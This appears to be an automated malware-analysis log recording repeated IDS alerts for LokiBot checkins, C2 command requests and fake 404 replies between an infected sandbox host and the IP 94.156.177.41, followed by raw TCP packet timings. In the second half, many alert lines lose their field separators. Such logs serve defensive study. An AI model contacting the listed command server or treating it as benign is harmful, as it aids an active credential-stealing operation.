                        2024-11-29T07:37:23.468794+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:23.468794+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:23.468794+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:24.907443+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:24.907443+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:25.027569+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49746 | TCP
                        2024-11-29T07:37:25.297011+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:25.297011+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:25.297011+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:29.724840+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:29.724840+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:29.844766+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49747 | TCP
                        2024-11-29T07:37:30.107976+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:30.107976+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:30.107976+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:31.916984+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:31.916984+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:32.037107+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49748 | TCP
                        2024-11-29T07:37:32.298014+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:32.298014+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:32.298014+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:33.620651+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:33.620651+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:33.740688+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49749 | TCP
                        2024-11-29T07:37:34.000360+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:34.000360+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:34.000360+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:35.522594+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:35.522594+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:35.642714+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49750 | TCP
                        2024-11-29T07:37:35.905770+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:35.905770+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:35.905770+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:37.284247+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:37.284247+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:37.404244+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49751 | TCP
                        2024-11-29T07:37:37.671798+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:37.671798+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:37.671798+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:39.136283+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:39.136283+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:39.256251+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49752 | TCP
                        2024-11-29T07:37:39.516381+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:39.516381+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:39.516381+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:40.913875+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:40.913875+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:41.033957+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49753 | TCP
                        2024-11-29T07:37:41.298199+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:41.298199+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:41.298199+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:42.666274+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:42.666274+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:42.786866+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49754 | TCP
                        2024-11-29T07:37:43.127928+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:43.127928+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:43.127928+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:44.438287+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:44.438287+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:44.558497+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49755 | TCP
                        2024-11-29T07:37:44.826715+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:44.826715+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:44.826715+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:46.112958+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:46.112958+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:46.232846+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49756 | TCP
                        2024-11-29T07:37:46.499557+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:46.499557+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:46.499557+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:47.963472+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:47.963472+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:48.083520+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49757 | TCP
                        2024-11-29T07:37:48.348566+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:48.348566+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:48.348566+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:49.835944+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:49.835944+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:49.955918+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49758 | TCP
                        2024-11-29T07:37:50.256361+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:50.256361+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:50.256361+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:54.778517+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:54.778517+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:54.898521+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49759 | TCP
                        2024-11-29T07:37:55.174548+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:55.174548+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:55.174548+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:56.550153+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:56.550153+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:56.670018+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49760 | TCP
                        2024-11-29T07:37:56.938795+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:56.938795+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:56.938795+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:58.419693+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:58.419693+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:58.539743+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49763 | TCP
                        2024-11-29T07:37:58.812353+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:58.812353+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:58.812353+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:00.701009+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:00.701009+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:00.821049+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49764 | TCP
                        2024-11-29T07:38:01.082225+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:01.082225+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:01.082225+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:02.367408+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:02.367408+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:02.487383+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49770 | TCP
                        2024-11-29T07:38:02.758235+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:02.758235+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:02.758235+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:04.200296+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:04.200296+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:04.320327+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49776 | TCP
                        2024-11-29T07:38:04.577451+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:04.577451+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:04.577451+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:05.909208+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:05.909208+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:38:06.029060+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449782TCP
                        2024-11-29T07:38:06.307814+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978894.156.177.4180TCP
                        2024-11-29T07:38:06.307814+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978894.156.177.4180TCP
                        2024-11-29T07:38:06.307814+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978894.156.177.4180TCP
                        2024-11-29T07:38:07.785106+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978894.156.177.4180TCP
                        2024-11-29T07:38:07.785106+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978894.156.177.4180TCP
                        2024-11-29T07:38:07.905771+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449788TCP
                        2024-11-29T07:38:08.178167+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978994.156.177.4180TCP
                        2024-11-29T07:38:08.178167+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978994.156.177.4180TCP
                        2024-11-29T07:38:08.178167+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978994.156.177.4180TCP
                        2024-11-29T07:38:12.701337+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978994.156.177.4180TCP
                        2024-11-29T07:38:12.701337+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978994.156.177.4180TCP
                        2024-11-29T07:38:12.821427+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449789TCP
                        2024-11-29T07:38:13.081566+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980594.156.177.4180TCP
                        2024-11-29T07:38:13.081566+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980594.156.177.4180TCP
                        2024-11-29T07:38:13.081566+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980594.156.177.4180TCP
                        2024-11-29T07:38:14.378688+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980594.156.177.4180TCP
                        2024-11-29T07:38:14.378688+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980594.156.177.4180TCP
                        2024-11-29T07:38:14.498649+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449805TCP
                        2024-11-29T07:38:14.764601+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980694.156.177.4180TCP
                        2024-11-29T07:38:14.764601+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980694.156.177.4180TCP
                        2024-11-29T07:38:14.764601+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980694.156.177.4180TCP
                        2024-11-29T07:38:36.587730+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980694.156.177.4180TCP
                        2024-11-29T07:38:36.587730+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980694.156.177.4180TCP
                        Nov 29, 2024 07:37:58.690092087 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.690169096 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.692344904 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.812290907 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:37:58.812352896 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:37:58.932444096 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.700906992 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.701009035 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.701066017 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.701111078 CET4976480192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.821048975 CET804976494.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.836030960 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.956079960 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:00.956163883 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:00.958424091 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:01.078418016 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:01.082225084 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:01.202279091 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.367278099 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.367408037 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.367448092 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.367502928 CET4977080192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.487382889 CET804977094.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.513943911 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.633985996 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.634252071 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.636234045 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.756175041 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:02.758234978 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:02.878278017 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.200182915 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.200263023 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.200295925 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.200371981 CET4977680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.320327044 CET804977694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.335005045 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.455049992 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.455151081 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.457258940 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.577389002 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:04.577450991 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:04.697391033 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:05.909101963 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:05.909208059 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:05.909281969 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:05.909329891 CET4978280192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.029059887 CET804978294.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:06.061925888 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.182190895 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:06.183864117 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.186880112 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.307758093 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:06.307813883 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:06.427777052 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.784981966 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.785079002 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.785105944 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:07.785188913 CET4978880192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:07.905771017 CET804978894.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:07.935682058 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.055808067 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:08.055876017 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.058146954 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.178117990 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:08.178167105 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:08.298235893 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.701245070 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.701337099 CET4978980192.168.2.494.156.177.41
